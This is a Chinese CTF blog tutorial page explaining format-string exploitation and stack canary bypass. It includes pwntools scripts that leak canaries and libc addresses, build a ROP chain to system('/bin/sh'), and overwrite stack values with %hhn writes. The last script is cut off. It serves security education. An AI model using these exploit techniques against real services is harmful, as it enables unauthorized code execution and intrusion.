<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="写的很乱，日后再改  原理格式化输出函数1234int printf(const char *format, ...);int fprintf(FILE *stream, const char *format, ...);int sprintf(char *str, const char *format, ...);int snprintf(char *str, size_t size, con">
<meta property="og:type" content="article">
<meta property="og:title" content="PWN从入门到出入平安（一）——格式化字符与Canary">
<meta property="og:url" content="http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/index.html">
<meta property="og:site_name" content="Whirling-In-Rags">
<meta property="og:description" content="写的很乱，日后再改  原理格式化输出函数1234int printf(const char *format, ...);int fprintf(FILE *stream, const char *format, ...);int sprintf(char *str, const char *format, ...);int snprintf(char *str, size_t size, con">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/img/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary.assets/image-20230522230246834.png">
<meta property="article:published_time" content="2023-04-20T09:10:09.000Z">
<meta property="article:modified_time" content="2023-12-09T07:11:23.568Z">
<meta property="article:author" content="DeePunk">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary.assets/image-20230522230246834.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>PWN从入门到出入平安（一）——格式化字符与Canary</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/DeePunk42">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2023/05/09/MK-Physics/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E9%9B%B6%EF%BC%89%E2%80%94%E2%80%94%E5%B7%A5%E5%85%B7%E7%AF%87/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&text=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&is_video=false&description=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=PWN从入门到出入平安（一）——格式化字符与Canary&body=Check out this article: http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&title=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&name=PWN从入门到出入平安（一）——格式化字符与Canary&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/04/20/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary/&t=PWN从入门到出入平安（一）——格式化字符与Canary"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E8%BE%93%E5%87%BA%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.</span> <span class="toc-text">格式化输出函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8D%A0%E4%BD%8D%E7%AC%A6%E8%AF%AD%E6%B3%95"><span class="toc-number">1.2.</span> <span class="toc-text">占位符语法</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#parameter"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">parameter</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#type"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">type</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2%E6%A0%88%E4%B8%8A%E6%95%B0%E6%8D%AE"><span class="toc-number">2.1.</span> <span class="toc-text">泄露栈上数据</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80"><span class="toc-number">3.</span> <span class="toc-text">泄露libc地址</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2%E6%A0%88%E4%B8%8A%E5%9C%B0%E5%9D%80%E6%8C%87%E5%90%91%E7%9A%84%E6%95%B0%E6%8D%AE"><span class="toc-number">3.1.</span> <span class="toc-text">泄露栈上地址指向的数据</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%86%E7%9B%96%E6%A0%88%E4%B8%8A%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80"><span class="toc-number">3.2.</span> <span class="toc-text">覆盖栈上任意地址</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B"><span class="toc-number">3.2.0.1.</span> <span class="toc-text">实例</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Canary"><span class="toc-number">4.</span> <span class="toc-text">Canary</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B0%B4%E6%B0%B4%E5%AE%9E%E4%BE%8B"><span class="toc-number">5.</span> <span class="toc-text">水水实例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fmtstr-payload"><span class="toc-number"></span> <span class="toc-text">fmtstr_payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9B%E9%98%B6%E6%93%8D%E4%BD%9C"><span class="toc-number"></span> <span class="toc-text">进阶操作</span></a>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        PWN从入门到出入平安（一）——格式化字符与Canary
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">DeePunk</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-04-20T09:10:09.000Z" class="dt-published" itemprop="datePublished">2023-04-20</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CS/">CS</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/CTF/" rel="tag">CTF</a>, <a class="p-category" href="/tags/PWN/" rel="tag">PWN</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <blockquote>
<p>写的很乱，日后再改</p>
</blockquote>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><h4 id="格式化输出函数"><a href="#格式化输出函数" class="headerlink" title="格式化输出函数"></a>格式化输出函数</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">printf</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *format, ...)</span>;</span><br><span class="line"><span class="type">int</span> <span class="title function_">fprintf</span><span class="params">(FILE *stream, <span class="type">const</span> <span class="type">char</span> *format, ...)</span>;</span><br><span class="line"><span class="type">int</span> <span class="title function_">sprintf</span><span class="params">(<span class="type">char</span> *str, <span class="type">const</span> <span class="type">char</span> *format, ...)</span>;</span><br><span class="line"><span class="type">int</span> <span class="title function_">snprintf</span><span class="params">(<span class="type">char</span> *str, <span class="type">size_t</span> size, <span class="type">const</span> <span class="type">char</span> *format, ...)</span>;</span><br></pre></td></tr></table></figure>

<h4 id="占位符语法"><a href="#占位符语法" class="headerlink" title="占位符语法"></a>占位符语法</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%[parameter][flags][field width][.precision][length]type</span><br></pre></td></tr></table></figure>

<h6 id="parameter"><a href="#parameter" class="headerlink" title="parameter"></a>parameter</h6><p>n$：第几个参数</p>
<h6 id="type"><a href="#type" class="headerlink" title="type"></a>type</h6><p>X：Hex</p>
<p>p：void*指针型值</p>
<p>n：把已经成功输出的字符个数写入对应整型指针参数所指变量</p>
<p>%n     一次性写入 4 个字节</p>
<p>%hn     一次性写入 2 个字节</p>
<p>%hhn    一次性写入 1 个字节</p>
<p>%lln 8</p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>第几个参数可以通过gdb的fmtarg功能查找</p>
<p><img src="/../img/PWN%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%87%BA%E5%85%A5%E5%B9%B3%E5%AE%89%EF%BC%88%E4%B8%80%EF%BC%89%E2%80%94%E2%80%94%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%8ECanary.assets/image-20230522230246834.png" alt="image-20230522230246834"></p>
<blockquote>
<p>懒狗是这样的，直接截</p>
</blockquote>
<h4 id="泄露栈上数据"><a href="#泄露栈上数据" class="headerlink" title="泄露栈上数据"></a>泄露栈上数据</h4><p><code>%X$p</code> <code>%X$x</code> <code>%08x</code> 可泄露栈上数据，可用于泄露canary</p>
<p>也可先在栈上写上需要的数据，再利用进行任意内存写，如<code>%Yc%X$n</code> </p>
<h3 id="泄露libc地址"><a href="#泄露libc地址" class="headerlink" title="泄露libc地址"></a>泄露libc地址</h3><p>libcmain地址会在调用main时存入</p>
<h4 id="泄露栈上地址指向的数据"><a href="#泄露栈上地址指向的数据" class="headerlink" title="泄露栈上地址指向的数据"></a>泄露栈上地址指向的数据</h4><p><code> %s</code> 显示地址指向的ascll，可用于got表泄露</p>
<h4 id="覆盖栈上任意地址"><a href="#覆盖栈上任意地址" class="headerlink" title="覆盖栈上任意地址"></a>覆盖栈上任意地址</h4><h6 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h6><p>尝试将 <code>arg2</code> 的值更改为任意值 （ 比如 <code>0x00000020</code> ，十进制 32 ）在gdb中可以看到得到<code>arg2</code>的地址<code>0xffffd538</code>， 那么我们构造格式字符串<code>\x38\xd5\xff\xff%08x%08x%012d%13$n</code> ， 且中 <code>\x38\xd5\xff\xff</code> 表示 <code>arg2</code> 的地址，占 4 字节，<code>％08x％08X</code> 表示两个 8 字符宽的十六进制数 ， 占 16 字节 ，<code>％012d</code> 占 12 字节 ， 三个部分加起来就占了4 + 16 + 12 &#x3D; 32 字节 ， 即把 arg2 赋值为 <code>0x00000020</code>。 格式字符串最后一部分<code>％13$n</code>也是最重要的一部分，和上面的内容一样 ， 表示格式字符串的第 13 个参数 ， 即写入 <code>0xffffd538</code> 的地方（ <code>0xffffd564 </code>）<code>printf()</code> 就是通过这个地址找到被覆盖的内容的 </p>
<p><code>printf</code> 首先解析 <code>％13$</code> 找到获得地址<code>0xffffd564</code> 的值<code>0xffffd538</code>， 然后跳转到地址 <code>0xffffd538</code>， 将它的值 <code>0X88888888</code> 覆盖为 <code>20</code> ， 就得到<code>arg2 = 0x00000020 </code></p>
<h3 id="Canary"><a href="#Canary" class="headerlink" title="Canary"></a>Canary</h3><table>
<thead>
<tr>
<th align="right">High address</th>
<th align="center"></th>
</tr>
</thead>
<tbody><tr>
<td align="right"></td>
<td align="center">args</td>
</tr>
<tr>
<td align="right"></td>
<td align="center">return address</td>
</tr>
<tr>
<td align="right">rbp</td>
<td align="center">old ebp</td>
</tr>
<tr>
<td align="right">rbp - 8</td>
<td align="center">canary value</td>
</tr>
<tr>
<td align="right"></td>
<td align="center">local variable</td>
</tr>
<tr>
<td align="right">Low address</td>
<td align="center"></td>
</tr>
</tbody></table>
<h3 id="水水实例"><a href="#水水实例" class="headerlink" title="水水实例"></a>水水实例</h3><p>某某杯payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="comment">#p=process(&quot;./pwn1&quot;)</span></span><br><span class="line">p=remote(<span class="string">&quot;172.51.228.233&quot;</span>,<span class="number">9999</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;thing\n&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;tricks\n0x&#x27;</span>)</span><br><span class="line">base=<span class="built_in">int</span>(p.recvn(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line">backdoor=base-<span class="number">0x94</span></span><br><span class="line">binsh=base+<span class="number">0x202068</span>-<span class="number">0xa94</span></span><br><span class="line">gadgets=base+<span class="number">0xc73</span>-<span class="number">0xa94</span></span><br><span class="line">gadgets2=base+<span class="number">0x821</span>-<span class="number">0xa94</span></span><br><span class="line">sys=base+<span class="number">0x870</span>-<span class="number">0xa94</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;hello\n&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;%33$p&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">canary=<span class="built_in">int</span>(p.recvn(<span class="number">16</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;A&#x27;</span>*<span class="number">25</span>*<span class="number">8</span>+p64(canary)+<span class="string">b&quot;A&quot;</span>*<span class="number">8</span>+p64(gadgets)+p64(binsh)+p64(gadgets2)+p64(sys)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="fmtstr-payload"><a href="#fmtstr-payload" class="headerlink" title="fmtstr_payload"></a>fmtstr_payload</h2><p>fmtstr_payload(offset, writes, numbwritten&#x3D;0, write_size&#x3D;’byte’)<br>第一个参数表示格式化字符串的偏移；<br>第二个参数表示需要利用%n写入的数据，采用字典形式，我们要将printf的GOT数据改为system函数地址，就写成{printfGOT: systemAddress}；本题是将0804a048处改为0x2223322<br>第三个参数表示已经输出的字符个数，这里没有，为0，采用默认值即可；<br>第四个参数表示写入方式，是按字节（byte）、按双字节（short）还是按四字节（int），对应着hhn、hn和n，默认值是byte，即按hhn写。<br>fmtstr_payload函数返回的就是payload</p>
<p>实际上我们常用的形式是fmtstr_payload(offset,{address1:value1})</p>
<h2 id="进阶操作"><a href="#进阶操作" class="headerlink" title="进阶操作"></a>进阶操作</h2><p>读入函数不保存在栈上，无法直接修改地址的情况</p>
<p>通过利用栈上已有的地址，向已有的地址写入想修改的地址，然后再将修改后的地址作为参数</p>
<p>例：dasctf2023bin专项，fooooood（wp转载）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.terminal=[<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># p=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p=remote(<span class="string">&#x27;localhost&#x27;</span>,<span class="number">9999</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"><span class="comment"># 1-&gt;11 2-&gt;37</span></span><br><span class="line"><span class="comment"># 1-&gt;25 2-&gt;39</span></span><br><span class="line"><span class="comment"># 覆盖变量i为40</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;name:&#x27;</span>,<span class="string">b&#x27;aaa&#x27;</span>);</span><br><span class="line">payload=<span class="string">b&#x27;%11$p&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;like &#x27;</span>)</span><br><span class="line">rsp=<span class="built_in">int</span>(p.recvuntil(<span class="string">&#x27;!?&#x27;</span>)[:-<span class="number">2</span>],<span class="number">16</span>)-<span class="number">248</span></span><br><span class="line">i=rsp+<span class="number">4</span></span><br><span class="line">i_off=i&amp;<span class="number">0xffff</span></span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(i_off).encode()+<span class="string">b&#x27;c%11$hn&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(<span class="number">40</span>).encode()+<span class="string">b&#x27;c%37$hhn&#x27;</span></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line"><span class="comment">#泄露libc_base</span></span><br><span class="line">payload=<span class="string">b&#x27;%9$p&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;like &#x27;</span>)</span><br><span class="line">libc.address=<span class="built_in">int</span>(p.recvuntil(<span class="string">&#x27;!?&#x27;</span>)[:-<span class="number">2</span>],<span class="number">16</span>)-<span class="number">240</span>-libc.sym.__libc_start_main<span class="comment">#简单的格式化字符串利用函数，将dest地址的后8字节循环更改成ptr对应的字节，off1与off2为上述</span></span><br><span class="line">（<span class="number">1</span>）与（<span class="number">2</span>）两个栈地址在格式化字符串中的偏移</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">overlap</span>(<span class="params">dest,ptr,off1,off2</span>):</span><br><span class="line">d=dest&amp;<span class="number">0xff</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> ptr:</span><br><span class="line"><span class="keyword">break</span></span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(d).encode()+<span class="string">b&#x27;c%&#x27;</span>+<span class="built_in">str</span>(off1).encode()+<span class="string">b&#x27;$hhn&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">f=ptr&amp;<span class="number">0xff</span></span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(f).encode()+<span class="string">b&#x27;c%&#x27;</span>+<span class="built_in">str</span>(off2).encode()+<span class="string">b&#x27;$hhn&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;food: &#x27;</span>,payload)</span><br><span class="line">d+=<span class="number">1</span></span><br><span class="line">ptr&gt;&gt;=<span class="number">8</span></span><br><span class="line">ret=rsp+<span class="number">0x18</span></span><br><span class="line">ptr=libc.address+<span class="number">0x21112</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc.sym.system))</span><br><span class="line"><span 